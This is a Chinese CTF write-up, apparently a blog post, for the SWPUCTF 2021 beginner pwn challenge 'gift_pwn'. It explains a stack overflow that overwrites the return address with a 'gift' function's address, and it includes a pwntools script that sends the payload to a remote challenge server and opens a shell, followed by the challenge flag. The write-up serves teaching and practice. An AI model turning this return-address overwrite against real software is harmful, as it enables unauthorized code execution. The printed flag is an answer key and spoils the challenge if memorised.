[SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天

简介: [SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天

按照签到题的套路是找main,buf,shell,bin/sh/,这个是加了一个gift的地址

距离rbp 16字节,我们要再加上我们的8个字节

最后加上我们的返回地址,是上面找到的gift的地址,payload就完成了

from pwn import *
p = remote('node4.anna.nssctf.cn',28325)
payload = b'a' * 0x10 + b'a' * 8 + p64(0x4005b6)
p.send(payload)
p.interactive()

NSSCTF{7b6d2d8a-b6a5-4c40-bcdd-f4604c025219}


目录
相关文章
|
JSON PHP 数据格式
[SWPUCTF 2021 新生赛]jicao
[SWPUCTF 2021 新生赛]jicao
798 0
|
Shell
[NISACTF 2022]ezstack-入土为安的第十四天
[NISACTF 2022]ezstack-入土为安的第十四天
179 0
|
Shell
[NISACTF 2022]ezpie- 入土为安的第十五天
[NISACTF 2022]ezpie- 入土为安的第十五天
264 0
|
安全 Shell PHP
escapeshellarg() 和 escapeshellcmd()
escapeshellarg() 和 escapeshellcmd()
|
PHP
NSS [NISACTF 2022]level-up
NSS [NISACTF 2022]level-up
236 0
|
缓存 PHP
[SWPUCTF 2021 新生赛]Do_you_know_http
[SWPUCTF 2021 新生赛]Do_you_know_http
1025 0
|
SQL Python
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
1220 0
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
|
SQL 存储 安全
CTF--Web安全--SQL注入之报错注入
CTF--Web安全--SQL注入之报错注入
BUUCTF 大白 1
BUUCTF 大白 1
483 0